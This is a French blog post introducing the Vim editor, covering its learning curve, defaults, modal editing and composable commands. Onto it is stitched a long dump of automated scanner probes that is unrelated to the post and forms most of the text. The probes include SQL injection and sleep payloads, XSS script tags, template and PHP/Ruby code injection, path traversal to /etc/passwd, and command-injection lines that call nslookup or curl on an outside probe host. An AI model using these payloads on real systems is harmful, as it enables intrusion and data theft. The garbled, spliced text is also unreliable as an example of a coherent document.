Vim, première approche
Ce post est destiné aux personnes connaissant peu, ou pas, l'éditeur Vim. J'ai voulu expliquer en gros ce qu'est Vim, et pourquoi il reste mon éditeur de prédiléction depuis que j'ai appris à m'en servir.
Défauts
Vim n'est pas intuitif
La blague récurrente qui dit
"Comment générer une suite de caractères aléatoires ?"
"C'est simple, il suffit de mettre un débutant face à Vim et de lui demander de quitter."
n'est pas totalement infondée. Toutes les touches du clavier sont des raccourcis, et ceux-ci sont plutôt très différents des raccourcis des éditeurs usuels. Il est donc normal de se retrouver un peu perdu quand on ne le connaît pas.
La barrière d'entrée est donc très élevée. Il faut investir un certain temps à l'apprentissage avant de pouvoir être à l'aise sous Vim. Cette image parle d'elle même :
Les options par défaut sont loin d'être optimales
Vim est capable de faire énormément de choses, mais il est configuré par défaut de manière très conservatrice, pour rester compatible avec son ancêtre Vi.
Des choses aussi basiques que l'affichage du numéro de ligne, la coloration syntaxique, la recherche incrémentale insensible à la casse, la coloration des résultats de recherche, ou le support de la souris sont désactivées par défaut. Cela peut donc induire un novice à considérer vim comme un éditeur simpliste, alors qu'il suffit simplement d'activer ces options pour les utiliser.
Avantages
Vim est efficace
Allant de pair avec sa difficulté de prise en main, Vim est extrêmement efficace: je ne connais pas d'éditeur permettant de faire autant de choses en aussi peu de touches. Il y a même une compétition sur ce principe. Il permet de se passer totalement de la souris, et d'avoir tous les raccourcis claviers à portée de main. On évite le changement de contexte clavier/souris qui fait perdre beaucoup de temps. De plus, il est bardé de fonctionnalités que l'on retrouve très rarement, voir pas du tout, chez les autres éditeurs.
Vim est répandu sur les serveurs
Vim est installé par défaut sur une grande majorité de distributions Linux / Unix, ainsi que OS X (même si c'est souvent une version minimale). C'est un outil usuel pour toute personne passant un minimum de temps sur des consoles par ssh. Le maîtriser apporte un comfort indéniable. Au minimum, il faut connaître ce qui est enseigné par la commande vimtutor.
Vim est un logiciel libre, et est toujours maintenu
Même s'il existe depuis plus de vingt ans, vim est toujours maintenu, des patchs sont régulièrement intégrés. C'est visible sur github.
Vim est extrêmement personnalisable
En plus des centaines d'options disponibles de base, il existe des milliers de plugins qui comblent des tas de besoins différents.
Vim est modal
La plupart des raccourcis claviers des éditeurs sont composés d'un modificateur (Alt, Control, Shift, …) et d'une lettre. Vim propose un principe simple et génial: proposer un comportement différent suivant son mode d'opération. Les principaux modes sont normal, insertion, et command.
Le mode insertion est le comportement d'un éditeur classique : les touches pressées sont insérées dans le document.
En mode normal, chaque touche du clavier est une commande. Soudainement, vous avez sous les doigts une manette spécialisée dans l'édition de texte, avec une centaine de boutons. Il y a plusieurs manières de passer en mode insertion, la plus classique étant de taper i. Mais il est aussi possible de faire cwnouveau_motEchap sur un mot pour le remplacer par nouveau_mot.
Les commandes sont logiques
Le principal intérêt de ce système, est que les commandes peuvent être combinées, formant un langage. La plupart des commandes peuvent être divisées en 2 catégories : les commandes d'éditions (les verbes) et les commandes de mouvement (les sujets). w se déplace d'un mot, donc si je le précède de d (delete), ça va supprimer le mot. Si à la place de d j'utilise y (yank), cela va copier le mot à la place.
Cela permet des milliers de combinaisons, et facilite l'apprentissage : si j'apprends une nouvelle commande de déplacement, par exemple ) qui se déplace d'une phrase, je vais pouvoir l'associer à toutes les commandes d'édition que je connais. d) va supprimer une phrase, et y) va copier une phrase. De même, si j'apprends une nouvelle commande d'édition c (change, supprime et passe en mode insertion), je peux l'associer à toutes les commandes de mouvement: cw, c), …
Je mentionne juste ma commande préférée pour vous donner une idée de la puissance du truc. . va répéter la dernière commande d'édition. Ça inclue le texte tapé, par exemple cwmieux!Echap va remplacer le mot sous le curseur par mieux!. Après cela, il suffit de positionner le curseur sur un autre mot et d'appuer sur . pour le remplacer par mieux!. Je vous laisse imaginer les possibilités.
Pour finir
Vu qu'aujourd'hui c'est Pâques, je suis obligé de mentionner un Easter egg : essayez :h 42 Entrée pour voir ;-)
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1DnhNBLSO
1
1
1
1
1
1
1
response.write(9361274*9323618)
'+response.write(9361274*9323618)+'
1
1
1
"+response.write(9361274*9323618)+"
1
redirtest.acx
1
1
1
1
1
1
1
1
1
1
)
!(()&&!|*|*|
^(#$!@#$)(()))******
1
1
1
1
1
1
'"()
1
1
1
1'&&sleep(27*1000)*ijdwwb&&'
1
1
1"&&sleep(27*1000)*argssq&&"
1
1
1'||sleep(27*1000)*zidned||'
1
1
'.gethostbyname(lc('hiton'.'qrvmfgpif8d41.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(66).chr(115).chr(82).'
1
1"||sleep(27*1000)*wpgmfh||"
".gethostbyname(lc("hitik"."lopwouakfb190.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(70).chr(119).chr(74)."
1
HttP://bxss.me/t/xss.html?%00
gethostbyname(lc('hitgz'.'bjnmsdpo5a8ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(87).chr(106).chr(90)
1
bxss.me/t/xss.html?%00
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
1
Http://bxss.me/t/fit.txt
1
1
http://bxss.me/t/fit.txt%3F.jpg
echo vhhsvv$()\ trhowm\nz^xyu||a #' &echo vhhsvv$()\ trhowm\nz^xyu||a #|" &echo vhhsvv$()\ trhowm\nz^xyu||a #
1
/etc/shells
1
../../../../../../../../../../../../../../etc/shells
&echo bdvzfk$()\ lvqlgb\nz^xyu||a #' &echo bdvzfk$()\ lvqlgb\nz^xyu||a #|" &echo bdvzfk$()\ lvqlgb\nz^xyu||a #
1
../../../../../../../../../../../../../../etc/passwd
c:/windows/win.ini
1&echo vvlonx$()\ kjamre\nz^xyu||a #' &echo vvlonx$()\ kjamre\nz^xyu||a #|" &echo vvlonx$()\ kjamre\nz^xyu||a #
1
1
1
bxss.me
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
../../../../../../../../../../../../../../windows/win.ini
|echo cnvilo$()\ lyjupf\nz^xyu||a #' |echo cnvilo$()\ lyjupf\nz^xyu||a #|" |echo cnvilo$()\ lyjupf\nz^xyu||a #
'"
1
';print(md5(31337));$a='
1|echo asujng$()\ tfcydd\nz^xyu||a #' |echo asujng$()\ tfcydd\nz^xyu||a #|" |echo asujng$()\ tfcydd\nz^xyu||a #
file:///etc/passwd
"+"A".concat(70-3).concat(22*4).concat(100).concat(72).concat(115).concat(68)+(require"socket"
Socket.gethostbyname("hitqe"+"fdibamfq1ff45.bxss.me.")[3].to_s)+"
expr 9000461771 - 980660
1
";print(md5(31337));$a="
1
1
'+'A'.concat(70-3).concat(22*4).concat(104).concat(74).concat(108).concat(68)+(require'socket'
Socket.gethostbyname('hitcf'+'mfhwghsg6e54d.bxss.me.')[3].to_s)+'
(nslookup -q=cname hituoclidaokv3b8f1.bxss.me||curl hituoclidaokv3b8f1.bxss.me))
${@print(md5(31337))}
1
'A'.concat(70-3).concat(22*4).concat(113).concat(69).concat(114).concat(85)+(require'socket'
Socket.gethostbyname('hithz'+'wkoxliyce4041.bxss.me.')[3].to_s)
../1
${@print(md5(31337))}\
1
$(nslookup -q=cname hityrykdmsgbdda4e9.bxss.me||curl hityrykdmsgbdda4e9.bxss.me)
1
./1
1
&nslookup -q=cname hitbvoonmipmdd6b19.bxss.me&'\"`0&nslookup -q=cname hitbvoonmipmdd6b19.bxss.me&`'
'.print(md5(31337)).'
&(nslookup -q=cname hitgqpqvurtthd8e8e.bxss.me||curl hitgqpqvurtthd8e8e.bxss.me)&'\"`0&(nslookup -q=cname hitgqpqvurtthd8e8e.bxss.me||curl hitgqpqvurtthd8e8e.bxss.me)&`'
1
1
1
1
1
|(nslookup -q=cname hitldwmuawmqz3d878.bxss.me||curl hitldwmuawmqz3d878.bxss.me)
1
1
1
`(nslookup -q=cname hitljfifleaomfa022.bxss.me||curl hitljfifleaomfa022.bxss.me)`
1
${10000354+10000200}
;(nslookup -q=cname hitulydktcjhe3ff18.bxss.me||curl hitulydktcjhe3ff18.bxss.me)|(nslookup -q=cname hitulydktcjhe3ff18.bxss.me||curl hitulydktcjhe3ff18.bxss.me)&(nslookup -q=cname hitulydktcjhe3ff18.bxss.me||curl hitulydktcjhe3ff18.bxss.me)
1
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
1
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitqhlbihesjn92069.bxss.me||curl${IFS}hitqhlbihesjn92069.bxss.me)
1
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitqyswzjbrbdb201c.bxss.me||curl${IFS}hitqyswzjbrbdb201c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqyswzjbrbdb201c.bxss.me||curl${IFS}hitqyswzjbrbdb201c.bxss.me)&`'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"()&%UQFG(9892)
'"()&%UQFG(9124)
19367325
bfg5386%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5386
bfgx5449%C0%BEz1%C0%BCz2a%90bcxhjl5449
1
1
1}}"}}'}}1%>"%>'%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1UQFG(9195)
1RKWYO[!+!]
1UQFG(9754)
1UQFG(9627)9627
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%55%51%46%47%28%39%33%30%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1UQFG(9127)
1
1UQFG(9109)
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%55%51%46%47%289522%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\UQFG(9583)\u003C/sCripT\u003E
1<ScRiPt>UQFG(9830)</sCripT>
�
1
1}body{zzz:Expre/**/SSion(UQFG(9387))}
1ljd2y
UQFG(9510)
1IVGK5[!+!]
1
1
1
1
1
1
1
1
1
1
1
1
1
1
555
1
1
1mQC9c3iO
1
1
1
1
1
1
1
1
1
redirtest.acx
1
1
1
response.write(9397083*9295704)
1
'+response.write(9397083*9295704)+'
1
1
"+response.write(9397083*9295704)+"
1
1
)
1
1
1
555
!(()&&!|*|*|
1
1
1
1
^(#$!@#$)(()))******
'.gethostbyname(lc('hitkx'.'zunoekyr3d854.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(83).chr(106).chr(68).'
1
1
1
".gethostbyname(lc("hitan"."qjaikozt3772f.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(102).chr(89)."
1
1
gethostbyname(lc('hitnu'.'nbgtkunf7219c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(65).chr(115).chr(87)
1
HttP://bxss.me/t/xss.html?%00
1
'"()
1'&&sleep(27*1000)*sifbuo&&'
bxss.me/t/xss.html?%00
1"&&sleep(27*1000)*kirovc&&"
1
1
1'||sleep(27*1000)*vdrdaf||'
1
1
1"||sleep(27*1000)*mzvifm||"
1
'"
1
1
1
"+"A".concat(70-3).concat(22*4).concat(105).concat(83).concat(105).concat(90)+(require"socket"
Socket.gethostbyname("hitpv"+"kczxffvy8ebb5.bxss.me.")[3].to_s)+"
1
'+'A'.concat(70-3).concat(22*4).concat(99).concat(70).concat(101).concat(65)+(require'socket'
Socket.gethostbyname('hitvu'+'irvueieffeb32.bxss.me.')[3].to_s)+'
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
'A'.concat(70-3).concat(22*4).concat(115).concat(67).concat(98).concat(72)+(require'socket'
Socket.gethostbyname('hitsz'+'hhjzgkkae041a.bxss.me.')[3].to_s)
1
';print(md5(31337));$a='
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
";print(md5(31337));$a="
1
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
1
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
${@print(md5(31337))}
1
1
${10000381+9999154}
${@print(md5(31337))}\
1
Http://bxss.me/t/fit.txt
1
http://bxss.me/t/fit.txt%3F.jpg
1
'.print(md5(31337)).'
1
/etc/shells
1
../../../../../../../../../../../../../../etc/shells
1
1
c:/windows/win.ini
1
1
bxss.me
1
echo rgsabq$()\ upsupy\nz^xyu||a #' &echo rgsabq$()\ upsupy\nz^xyu||a #|" &echo rgsabq$()\ upsupy\nz^xyu||a #
1
1
&echo dxakkd$()\ gyyaef\nz^xyu||a #' &echo dxakkd$()\ gyyaef\nz^xyu||a #|" &echo dxakkd$()\ gyyaef\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
1
555
1&echo nckujw$()\ rauajh\nz^xyu||a #' &echo nckujw$()\ rauajh\nz^xyu||a #|" &echo nckujw$()\ rauajh\nz^xyu||a #
1
1
file:///etc/passwd
|echo qwxkyh$()\ fpgavo\nz^xyu||a #' |echo qwxkyh$()\ fpgavo\nz^xyu||a #|" |echo qwxkyh$()\ fpgavo\nz^xyu||a #
1
1
555
1
1|echo oltlpv$()\ qpobhb\nz^xyu||a #' |echo oltlpv$()\ qpobhb\nz^xyu||a #|" |echo oltlpv$()\ qpobhb\nz^xyu||a #
../1
expr 9000837685 - 954828
1
(nslookup -q=cname hitsjogjcveynd52ce.bxss.me||curl hitsjogjcveynd52ce.bxss.me))
./1
1
$(nslookup -q=cname hitbgsrjfbcjc6fe96.bxss.me||curl hitbgsrjfbcjc6fe96.bxss.me)
1
1
&nslookup -q=cname hitdoeoqhhwbi4add9.bxss.me&'\"`0&nslookup -q=cname hitdoeoqhhwbi4add9.bxss.me&`'
1
&(nslookup -q=cname hitlfytaljauj90ae4.bxss.me||curl hitlfytaljauj90ae4.bxss.me)&'\"`0&(nslookup -q=cname hitlfytaljauj90ae4.bxss.me||curl hitlfytaljauj90ae4.bxss.me)&`'
1
1
|(nslookup -q=cname hitoydmuzcncke48eb.bxss.me||curl hitoydmuzcncke48eb.bxss.me)
1
`(nslookup -q=cname hitlpznlhnpvmc0b6c.bxss.me||curl hitlpznlhnpvmc0b6c.bxss.me)`
1
;(nslookup -q=cname hitsqxdzfaliwe3751.bxss.me||curl hitsqxdzfaliwe3751.bxss.me)|(nslookup -q=cname hitsqxdzfaliwe3751.bxss.me||curl hitsqxdzfaliwe3751.bxss.me)&(nslookup -q=cname hitsqxdzfaliwe3751.bxss.me||curl hitsqxdzfaliwe3751.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hiticbxbuajol6680d.bxss.me||curl${IFS}hiticbxbuajol6680d.bxss.me)
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitmxnxmdcits8dd93.bxss.me||curl${IFS}hitmxnxmdcits8dd93.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmxnxmdcits8dd93.bxss.me||curl${IFS}hitmxnxmdcits8dd93.bxss.me)&`'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"()&%TDsK(9627)
'"()&%TDsK(9257)
19740914
bfg9517%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9517
bfgx7005%C0%BEz1%C0%BCz2a%90bcxhjl7005
1
1
1}}"}}'}}1%>"%>'%>
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1TDsK(9574)
1BEZDP[!+!]
1TDsK(9371)
1
1TDsK(9136)9136
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%54%44%73%4B%28%39%38%33%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1TDsK(9354)
1
1TDsK(9712)
1
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%54%44%73%4B%289920%29%3C%2F%73%43%72%69%70%54%3E
1
1
1\u003CScRiPt\TDsK(9571)\u003C/sCripT\u003E
1
1<ScRiPt>TDsK(9701)</sCripT>
1
�
1
1}body{zzz:Expre/**/SSion(TDsK(9173))}
1vDGuO
TDsK(9427)
1QHFHS[!+!]
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+376-376-1=0+0+0+1 --
-1 OR 3+376-376-1=0+0+0+1 --
-1 OR 3*2
-1 OR 3*2>(0+5+376-376) --
-1 OR 2+58-58-1=0+0+0+1
-1 OR 3+58-58-1=0+0+0+1
-1 OR 3*2
-1 OR 3*2>(0+5+58-58)
-1' OR 2+895-895-1=0+0+0+1 --
-1' OR 3+895-895-1=0+0+0+1 --
-1' OR 3*2
-1' OR 3*2>(0+5+895-895) --
-1' OR 2+744-744-1=0+0+0+1 or 'k7d9KtjH'='
-1' OR 3+744-744-1=0+0+0+1 or 'k7d9KtjH'='
-1' OR 3*2
-1' OR 3*2>(0+5+744-744) or 'k7d9KtjH'='
-1" OR 2+693-693-1=0+0+0+1 --
-1" OR 3+693-693-1=0+0+0+1 --
-1" OR 3*2
-1" OR 3*2>(0+5+693-693) --
1*if(now()=sysdate(),sleep(15),0)
1
1'"()&%wLTj(9130)
1
'"()&%wLTj(9232)
19025323
1
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
bfg1799%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1799
1
bfgx8274%C0%BEz1%C0%BCz2a%90bcxhjl8274
1
1
1
1
1}}"}}'}}1%>"%>'%>
1
1
1
dfb{{98991*97996}}xca
1
1
dfb[[${98991*97996}]]xca
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
dfb__${98991*97996}__::.x
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1wLTj(9032)
1
1
1OHSIV[!+!]
1
1wLTj(9490)
1
1wLTj(9752)9752
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%77%4C%54%6A%28%39%31%33%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
1wLTj(9233)
1
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1wLTj(9755)
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%77%4C%54%6A%289188%29%3C%2F%73%43%72%69%70%54%3E
1-1; waitfor delay '0:0:15' --
1
1\u003CScRiPt\wLTj(9395)\u003C/sCripT\u003E
1
1<ScRiPt>wLTj(9594)</sCripT>
�
1
1
1
1
1
1}body{zzz:Expre/**/SSion(wLTj(9826))}
1
1zr7vF
wLTj(9929)
1
1F1HOA[!+!]
1
1-1); waitfor delay '0:0:15' --
1
1
1
1
1-1 waitfor delay '0:0:15' --
555
1
1'"()&%qffO(9790)
1CttwPsMu'; waitfor delay '0:0:15' --
555
1
'"()&%qffO(9798)
1
19849815
1
bfg3747%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3747
1
bfgx2964%C0%BEz1%C0%BCz2a%90bcxhjl2964
1
1
1
1
1
1
1}}"}}'}}1%>"%>'%>
1-1 OR 897=(SELECT 897 FROM PG_SLEEP(15))--
1
1
1
1
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
1
dfb__${98991*97996}__::.x
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
1
1qffO(9112)
555
1
163XSJ[!+!]
1qffO(9905)
1
1-1) OR 861=(SELECT 861 FROM PG_SLEEP(15))--
1
1qffO(9059)9059
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%71%66%66%4F%28%39%38%33%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
1qffO(9673)
1
1
1
1
1qffO(9441)
1
1
1
1
1
1
1
1
1
1-1)) OR 701=(SELECT 701 FROM PG_SLEEP(15))--
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%71%66%66%4F%289882%29%3C%2F%73%43%72%69%70%54%3E
1
1\u003CScRiPt\qffO(9327)\u003C/sCripT\u003E
1
1<ScRiPt>qffO(9006)</sCripT>
1LDlwL5rR' OR 940=(SELECT 940 FROM PG_SLEEP(15))--
1
1
�
1
1
1
1}body{zzz:Expre/**/SSion(qffO(9029))}
1
1YpJa2
qffO(9746)
1KZ7NQ[!+!]
1
1BmSydv3P') OR 392=(SELECT 392 FROM PG_SLEEP(15))--
1
1
1
1
1zP9LnOGP')) OR 199=(SELECT 199 FROM PG_SLEEP(15))--
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1����%2527%2522\'\"
1
@@8QtPv
1
1
1
1
1
-1 OR 2+75-75-1=0+0+0+1 --
-1 OR 3+75-75-1=0+0+0+1 --
-1 OR 3*2
-1 OR 3*2>(0+5+75-75) --
-1 OR 2+801-801-1=0+0+0+1
-1 OR 3+801-801-1=0+0+0+1
-1 OR 3*2
-1 OR 3*2>(0+5+801-801)
-1' OR 2+909-909-1=0+0+0+1 --
-1' OR 3+909-909-1=0+0+0+1 --
-1' OR 3*2
-1' OR 3*2>(0+5+909-909) --
-1' OR 2+571-571-1=0+0+0+1 or 'YpfUkVQD'='
-1' OR 3+571-571-1=0+0+0+1 or 'YpfUkVQD'='
-1' OR 3*2
-1' OR 3*2>(0+5+571-571) or 'YpfUkVQD'='
-1" OR 2+334-334-1=0+0+0+1 --
-1" OR 3+334-334-1=0+0+0+1 --
-1" OR 3*2
-1" OR 3*2>(0+5+334-334) --
1*if(now()=sysdate(),sleep(15),0)
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1-1; waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1
1'"()&%R0Ex(9938)
1
'"()&%R0Ex(9264)
1WeqtoBue'; waitfor delay '0:0:15' --
1
19560870
bfg7171%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7171
1
bfgx2266%C0%BEz1%C0%BCz2a%90bcxhjl2266
1
1
1
1
1}}"}}'}}1%>"%>'%>
1
1-1 OR 446=(SELECT 446 FROM PG_SLEEP(15))--
1
1
dfb{{98991*97996}}xca
1
dfb[[${98991*97996}]]xca
1
dfb__${98991*97996}__::.x
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1R0Ex(9786)
1
1OOXW1[!+!]
1
1R0Ex(9014)
1-1) OR 84=(SELECT 84 FROM PG_SLEEP(15))--
1R0Ex(9457)9457
1
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%52%30%45%78%28%39%38%35%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
1R0Ex(9509)
1
1
1R0Ex(9877)
1
1
1
1-1)) OR 927=(SELECT 927 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%52%30%45%78%289426%29%3C%2F%73%43%72%69%70%54%3E
1dTS7GS8G' OR 692=(SELECT 692 FROM PG_SLEEP(15))--
1
1\u003CScRiPt\R0Ex(9655)\u003C/sCripT\u003E
1
1<ScRiPt>R0Ex(9042)</sCripT>
�
1
1
1
1}body{zzz:Expre/**/SSion(R0Ex(9496))}
1
1
16ASNn012') OR 553=(SELECT 553 FROM PG_SLEEP(15))--
11ji8Q
R0Ex(9472)
1
1AHRDZ[!+!]
1
1
1
1
1
1
1HFLncGHh')) OR 481=(SELECT 481 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1����%2527%2522\'\"
@@IJBRR
1